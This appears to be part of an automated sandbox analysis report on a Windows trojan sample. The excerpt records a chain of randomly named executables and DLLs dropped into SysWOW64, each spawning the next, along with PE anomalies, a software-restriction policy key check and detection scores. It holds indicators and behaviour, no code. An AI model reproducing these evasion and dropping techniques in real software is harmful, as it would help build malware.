                      Source: Dfcboo32.exe.30.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Edgbhcim.exe.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Emogai32.exe.32.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Efgkjnfn.exe.33.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Eoappk32.exe.34.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Fkogfkdj.exe.35.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Fhedeo32.exe.36.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Feidnc32.exe.37.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Foaigifk.exe.38.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: Ggmnlk32.exe.39.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Nejhbi32.exeJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Nejhbi32.exe:Zone.Identifier:$DATAJump to behavior
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile created: C:\Windows\SysWOW64\Jcofqqkm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Ogjdllpi.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeFile created: C:\Windows\SysWOW64\Bpghkh32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Opbieagi.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeFile created: C:\Windows\SysWOW64\Fkdfmkhi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Oglabl32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeFile created: C:\Windows\SysWOW64\Hjanmb32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Olijjb32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeFile created: C:\Windows\SysWOW64\Jdackq32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Oeanchcn.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeFile created: C:\Windows\SysWOW64\Ligdce32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Oceoll32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeFile created: C:\Windows\SysWOW64\Pdkggn32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Onkcje32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeFile created: C:\Windows\SysWOW64\Fehgpcld.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Odekfoij.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeFile created: C:\Windows\SysWOW64\Jgemldcp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Ojacofgb.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeFile created: C:\Windows\SysWOW64\Bdlhdkdf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Ppllkpoo.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeFile created: C:\Windows\SysWOW64\Accicdme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Plbmqa32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeFile created: C:\Windows\SysWOW64\Chfnmf32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Plgflqpn.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeFile created: C:\Windows\SysWOW64\Lfcadoap.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Pqeoao32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeFile created: C:\Windows\SysWOW64\Akghbg32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeFile created: C:\Windows\SysWOW64\Qgcpihjl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeFile created: C:\Windows\SysWOW64\Clqdacnn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Ajkolbad.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeFile created: C:\Windows\SysWOW64\Khlnhl32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Bmlhnnne.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeFile created: C:\Windows\SysWOW64\Iemjhp32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeFile created: C:\Windows\SysWOW64\Bgamkfnl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeFile created: C:\Windows\SysWOW64\Mfdadc32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Bqjacldl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeFile created: C:\Windows\SysWOW64\Pdmohf32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Bnnampcf.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeFile created: C:\Windows\SysWOW64\Lfjejf32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Bnpnbp32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeFile created: C:\Windows\SysWOW64\Ekpjke32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Bgibkegc.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeFile created: C:\Windows\SysWOW64\Pkjmee32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Baagdk32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeFile created: C:\Windows\SysWOW64\Foelkeee.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Cfnpmb32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeFile created: C:\Windows\SysWOW64\Fcjdhk32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ccapffke.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeFile created: C:\Windows\SysWOW64\Ibigijoc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ceampi32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeFile created: C:\Windows\SysWOW64\Ipqipqal.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ceampi32.exeFile created: C:\Windows\SysWOW64\Cnjaioih.exe
                      Source: C:\Windows\SysWOW64\Ceampi32.exeFile created: C:\Windows\SysWOW64\Hjjfnehb.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Camgpi32.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeFile created: C:\Windows\SysWOW64\Ahhhnd32.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Dmfdkj32.exe
                      Source: C:\Windows\SysWOW64\Camgpi32.exeFile created: C:\Windows\SysWOW64\Ibbpip32.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeFile created: C:\Windows\SysWOW64\Hjdhea32.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeFile created: C:\Windows\SysWOW64\Ekpkmk32.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeFile created: C:\Windows\SysWOW64\Pfgpqb32.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeFile created: C:\Windows\SysWOW64\Kfnpbj32.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exeFile created: C:\Windows\SysWOW64\Flhljo32.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeFile created: C:\Windows\SysWOW64\Gfdcflnh.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exeFile created: C:\Windows\SysWOW64\Lbfpda32.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Fhedeo32.exe
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeFile created: C:\Windows\SysWOW64\Ajikgq32.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeFile created: C:\Windows\SysWOW64\Njaakj32.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Foaigifk.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exeFile created: C:\Windows\SysWOW64\Hdgplo32.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ggmnlk32.exe
                      Source: C:\Windows\SysWOW64\Foaigifk.exeFile created: C:\Windows\SysWOW64\Ckaenpam.dll
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_0042B8840_2_0042B884
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: 1_2_0042B8841_2_0042B884
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_0042B8842_2_0042B884
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_0042B8843_2_0042B884
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_0042B8844_2_0042B884
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_0042B8845_2_0042B884
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_0042B8846_2_0042B884
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 7_2_0042B8847_2_0042B884
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 8_2_0042B8848_2_0042B884
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 9_2_0042B8849_2_0042B884
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: 10_2_0042B88410_2_0042B884
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: 11_2_0042B88411_2_0042B884
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: 12_2_0042B88412_2_0042B884
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: 13_2_0042B88413_2_0042B884
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: 14_2_0042B88414_2_0042B884
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: 15_2_0042B88415_2_0042B884
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: 16_2_0042B88416_2_0042B884
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: 17_2_0042B88417_2_0042B884
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: 18_2_0042B88418_2_0042B884
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: 19_2_0042B88419_2_0042B884
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: 20_2_0042B88420_2_0042B884
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: 21_2_0042B88421_2_0042B884
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: 22_2_0042B88422_2_0042B884
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: 23_2_0042B88423_2_0042B884
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: 24_2_0042B88424_2_0042B884
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: 25_2_0042B88425_2_0042B884
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: 26_2_0042B88426_2_0042B884
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: 27_2_0042B88427_2_0042B884
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Ccapffke.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Baagdk32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: C:\Windows\SysWOW64\Ceampi32.exeCode function: String function: 00407EA4 appears 43 times
                      Source: Ojacofgb.exe.9.drStatic PE information: Number of sections : 16 > 10
                      Source: Onkcje32.exe.7.drStatic PE information: Number of sections : 16 > 10
                      Source: Dmfdkj32.exe.28.drStatic PE information: Number of sections : 16 > 10
                      Source: Bgamkfnl.exe.17.drStatic PE information: Number of sections : 16 > 10
                      Source: Camgpi32.exe.27.drStatic PE information: Number of sections : 16 > 10
                      Source: Nejhbi32.exe.0.drStatic PE information: Number of sections : 16 > 10
                      Source: Odekfoij.exe.8.drStatic PE information: Number of sections : 16 > 10
                      Source: Cfnpmb32.exe.23.drStatic PE information: Number of sections : 16 > 10
                      Source: Dnhmjm32.exe.29.drStatic PE information: Number of sections : 16 > 10
                      Source: Edgbhcim.exe.31.drStatic PE information: Number of sections : 16 > 10
                      Source: Cnjaioih.exe.26.drStatic PE information: Number of sections : 16 > 10
                      Source: h879iieoae.exeStatic PE information: Number of sections : 16 > 10
                      Source: Bqjacldl.exe.18.drStatic PE information: Number of sections : 16 > 10
                      Source: Bnpnbp32.exe.20.drStatic PE information: Number of sections : 16 > 10
                      Source: Pqeoao32.exe.13.drStatic PE information: Number of sections : 16 > 10
                      Source: Ogjdllpi.exe.1.drStatic PE information: Number of sections : 16 > 10
                      Source: Ceampi32.exe.25.drStatic PE information: Number of sections : 16 > 10
                      Source: Qgcpihjl.exe.14.drStatic PE information: Number of sections : 16 > 10
                      Source: Bnnampcf.exe.19.drStatic PE information: Number of sections : 16 > 10
                      Source: Baagdk32.exe.22.drStatic PE information: Number of sections : 16 > 10
                      Source: Fhedeo32.exe.36.drStatic PE information: Number of sections : 16 > 10
                      Source: Olijjb32.exe.4.drStatic PE information: Number of sections : 16 > 10
                      Source: Bgibkegc.exe.21.drStatic PE information: Number of sections : 16 > 10
                      Source: Fkogfkdj.exe.35.drStatic PE information: Number of sections : 16 > 10
                      Source: Foaigifk.exe.38.drStatic PE information: Number of sections : 16 > 10
                      Source: Oceoll32.exe.6.drStatic PE information: Number of sections : 16 > 10
                      Source: Efgkjnfn.exe.33.drStatic PE information: Number of sections : 16 > 10
                      Source: Ppllkpoo.exe.10.drStatic PE information: Number of sections : 16 > 10
                      Source: Opbieagi.exe.2.drStatic PE information: Number of sections : 16 > 10
                      Source: Plbmqa32.exe.11.drStatic PE information: Number of sections : 16 > 10
                      Source: Eoappk32.exe.34.drStatic PE information: Number of sections : 16 > 10
                      Source: Oeanchcn.exe.5.drStatic PE information: Number of sections : 16 > 10
                      Source: Ggmnlk32.exe.39.drStatic PE information: Number of sections : 16 > 10
                      Source: Emogai32.exe.32.drStatic PE information: Number of sections : 16 > 10
                      Source: Oglabl32.exe.3.drStatic PE information: Number of sections : 16 > 10
                      Source: Dfcboo32.exe.30.drStatic PE information: Number of sections : 16 > 10
                      Source: Ccapffke.exe.24.drStatic PE information: Number of sections : 16 > 10
                      Source: Feidnc32.exe.37.drStatic PE information: Number of sections : 16 > 10
                      Source: Ajkolbad.exe.15.drStatic PE information: Number of sections : 16 > 10
                      Source: Bmlhnnne.exe.16.drStatic PE information: Number of sections : 16 > 10
                      Source: Plgflqpn.exe.12.drStatic PE information: Number of sections : 16 > 10
                      Source: h879iieoae.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@80/81@0/0
                      Source: C:\Users\user\Desktop\h879iieoae.exeCode function: 0_2_004017AC CoInitialize,CLSIDFromString,VirtualAlloc,CoCreateInstance,0_2_004017AC
                      Source: C:\Users\user\Desktop\h879iieoae.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: h879iieoae.exeReversingLabs: Detection: 81%
                      Source: h879iieoae.exeVirustotal: Detection: 81%
                      Source: C:\Users\user\Desktop\h879iieoae.exeFile read: C:\Users\user\Desktop\h879iieoae.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\h879iieoae.exe "C:\Users\user\Desktop\h879iieoae.exe"
                      Source: C:\Users\user\Desktop\h879iieoae.exeProcess created: C:\Windows\SysWOW64\Nejhbi32.exe C:\Windows\system32\Nejhbi32.exe
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeProcess created: C:\Windows\SysWOW64\Ogjdllpi.exe C:\Windows\system32\Ogjdllpi.exe
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeProcess created: C:\Windows\SysWOW64\Opbieagi.exe C:\Windows\system32\Opbieagi.exe
                      Source: C:\Windows\SysWOW64\Opbieagi.exeProcess created: C:\Windows\SysWOW64\Oglabl32.exe C:\Windows\system32\Oglabl32.exe
                      Source: C:\Windows\SysWOW64\Oglabl32.exeProcess created: C:\Windows\SysWOW64\Olijjb32.exe C:\Windows\system32\Olijjb32.exe
                      Source: C:\Windows\SysWOW64\Olijjb32.exeProcess created: C:\Windows\SysWOW64\Oeanchcn.exe C:\Windows\system32\Oeanchcn.exe
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeProcess created: C:\Windows\SysWOW64\Oceoll32.exe C:\Windows\system32\Oceoll32.exe
                      Source: C:\Windows\SysWOW64\Oceoll32.exeProcess created: C:\Windows\SysWOW64\Onkcje32.exe C:\Windows\system32\Onkcje32.exe
                      Source: C:\Windows\SysWOW64\Onkcje32.exeProcess created: C:\Windows\SysWOW64\Odekfoij.exe C:\Windows\system32\Odekfoij.exe
                      Source: C:\Windows\SysWOW64\Odekfoij.exeProcess created: C:\Windows\SysWOW64\Ojacofgb.exe C:\Windows\system32\Ojacofgb.exe
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeProcess created: C:\Windows\SysWOW64\Ppllkpoo.exe C:\Windows\system32\Ppllkpoo.exe
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exeProcess created: C:\Windows\SysWOW64\Plbmqa32.exe C:\Windows\system32\Plbmqa32.exe
                      Source: C:\Windows\SysWOW64\Plbmqa32.exeProcess created: C:\Windows\SysWOW64\Plgflqpn.exe C:\Windows\system32\Plgflqpn.exe
                      Source: C:\Windows\SysWOW64\Plgflqpn.exeProcess created: C:\Windows\SysWOW64\Pqeoao32.exe C:\Windows\system32\Pqeoao32.exe
                      Source: C:\Windows\SysWOW64\Pqeoao32.exeProcess created: C:\Windows\SysWOW64\Qgcpihjl.exe C:\Windows\system32\Qgcpihjl.exe
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeProcess created: C:\Windows\SysWOW64\Ajkolbad.exe C:\Windows\system32\Ajkolbad.exe
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeProcess created: C:\Windows\SysWOW64\Bmlhnnne.exe C:\Windows\system32\Bmlhnnne.exe
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeProcess created: C:\Windows\SysWOW64\Bgamkfnl.exe C:\Windows\system32\Bgamkfnl.exe
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeProcess created: C:\Windows\SysWOW64\Bqjacldl.exe C:\Windows\system32\Bqjacldl.exe
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeProcess created: C:\Windows\SysWOW64\Bnnampcf.exe C:\Windows\system32\Bnnampcf.exe
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeProcess created: C:\Windows\SysWOW64\Bnpnbp32.exe C:\Windows\system32\Bnpnbp32.exe
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeProcess created: C:\Windows\SysWOW64\Bgibkegc.exe C:\Windows\system32\Bgibkegc.exe
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeProcess created: C:\Windows\SysWOW64\Baagdk32.exe C:\Windows\system32\Baagdk32.exe
                      Source: C:\Windows\SysWOW64\Baagdk32.exeProcess created: C:\Windows\SysWOW64\Cfnpmb32.exe C:\Windows\system32\Cfnpmb32.exe
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeProcess created: C:\Windows\SysWOW64\Ccapffke.exe C:\Windows\system32\Ccapffke.exe
                      Source: C:\Windows\SysWOW64\Ccapffke.exeProcess created: C:\Windows\SysWOW64\Ceampi32.exe C:\Windows\system32\Ceampi32.exe
                      Source: C:\Windows\SysWOW64\Ceampi32.exeProcess created: C:\Windows\SysWOW64\Cnjaioih.exe C:\Windows\system32\Cnjaioih.exe
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeProcess created: C:\Windows\SysWOW64\Camgpi32.exe C:\Windows\system32\Camgpi32.exe
                      Source: C:\Windows\SysWOW64\Camgpi32.exeProcess created: C:\Windows\SysWOW64\Dmfdkj32.exe C:\Windows\system32\Dmfdkj32.exe
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeProcess created: C:\Windows\SysWOW64\Dnhmjm32.exe C:\Windows\system32\Dnhmjm32.exe
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeProcess created: C:\Windows\SysWOW64\Dfcboo32.exe C:\Windows\system32\Dfcboo32.exe
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeProcess created: C:\Windows\SysWOW64\Edgbhcim.exe C:\Windows\system32\Edgbhcim.exe
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeProcess created: C:\Windows\SysWOW64\Emogai32.exe C:\Windows\system32\Emogai32.exe
                      Source: C:\Windows\SysWOW64\Emogai32.exeProcess created: C:\Windows\SysWOW64\Efgkjnfn.exe C:\Windows\system32\Efgkjnfn.exe
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeProcess created: C:\Windows\SysWOW64\Eoappk32.exe C:\Windows\system32\Eoappk32.exe
                      Source: C:\Windows\SysWOW64\Eoappk32.exeProcess created: C:\Windows\SysWOW64\Fkogfkdj.exe C:\Windows\system32\Fkogfkdj.exe
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeProcess created: C:\Windows\SysWOW64\Fhedeo32.exe C:\Windows\system32\Fhedeo32.exe
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeProcess created: C:\Windows\SysWOW64\Feidnc32.exe C:\Windows\system32\Feidnc32.exe
                      Source: C:\Windows\SysWOW64\Feidnc32.exeProcess created: C:\Windows\SysWOW64\Foaigifk.exe C:\Windows\system32\Foaigifk.exe
                      Source: C:\Users\user\Desktop\h879iieoae.exeProcess created: C:\Windows\SysWOW64\Nejhbi32.exe C:\Windows\system32\Nejhbi32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Nejhbi32.exeProcess created: C:\Windows\SysWOW64\Ogjdllpi.exe C:\Windows\system32\Ogjdllpi.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeProcess created: C:\Windows\SysWOW64\Opbieagi.exe C:\Windows\system32\Opbieagi.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Opbieagi.exeProcess created: C:\Windows\SysWOW64\Oglabl32.exe C:\Windows\system32\Oglabl32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oglabl32.exeProcess created: C:\Windows\SysWOW64\Olijjb32.exe C:\Windows\system32\Olijjb32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Olijjb32.exeProcess created: C:\Windows\SysWOW64\Oeanchcn.exe C:\Windows\system32\Oeanchcn.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeProcess created: C:\Windows\SysWOW64\Oceoll32.exe C:\Windows\system32\Oceoll32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Oceoll32.exeProcess created: C:\Windows\SysWOW64\Onkcje32.exe C:\Windows\system32\Onkcje32.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Onkcje32.exeProcess created: C:\Windows\SysWOW64\Odekfoij.exe C:\Windows\system32\Odekfoij.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Odekfoij.exeProcess created: C:\Windows\SysWOW64\Ojacofgb.exe C:\Windows\system32\Ojacofgb.exeJump to behavior
                      Source: C:\Windows\SysWOW64\Ojacofgb.exeProcess created: C:\Windows\SysWOW64\Ppllkpoo.exe C:\Windows\system32\Ppllkpoo.exeJump to behavior
